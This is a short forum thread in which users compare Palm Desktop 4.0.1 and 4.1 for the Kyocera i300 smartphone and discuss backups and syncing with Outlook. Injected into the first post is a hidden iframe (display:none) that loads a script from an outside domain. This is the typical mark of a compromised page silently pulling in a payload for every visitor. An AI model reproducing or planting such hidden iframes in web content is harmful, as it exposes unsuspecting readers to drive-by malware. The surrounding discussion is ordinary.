Has anyone tried to use Palm Desktop 4.1 with the i300? I just got the CD from a friend who uses the M505. Any pros or cons to use the Palm Desktop 4.1?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i have used the 4.0.1 since i got my 6035 back in april... it works FINE with the i300.. tons better than the 3.1...

you can get it at palm.com!

it has a backup feature that will save all of you 3rd party apps and voice/speed dial #'s...

That's great! I am glad 4.0.1 works with the i300. I am eagerly waiting for mine to come in.
I also heard that the new Sony Clie was going to have another updated Palm OS version 4.1 when it ships later this month. I wonder what changes that will have? Rumour was that it will have an MP3 app....

I never quite understood desktop?

I use outlook 2000 and sync with hotsyc and chapura

what exactly does desktop do, does it replace outlook? hotsync?, both?

palm desktop 4.0.1 is the updated version. it has support for backing up all of your 3rd paryty apps and voice/speed dial #'s. plus the interface is much better..

you use pocket mirror with it to sync up to outlook, etc..

i upgraded to 4.0
but i dont really see any difference
there are no new sync or backup options with chapura and i dont ever actually run palm dektop...

well if you dont run the palm desktop then you WONT see the benefit!... i thought you were using palm 4.0.1.. but i see you are not... sorry for the confusion.... :o
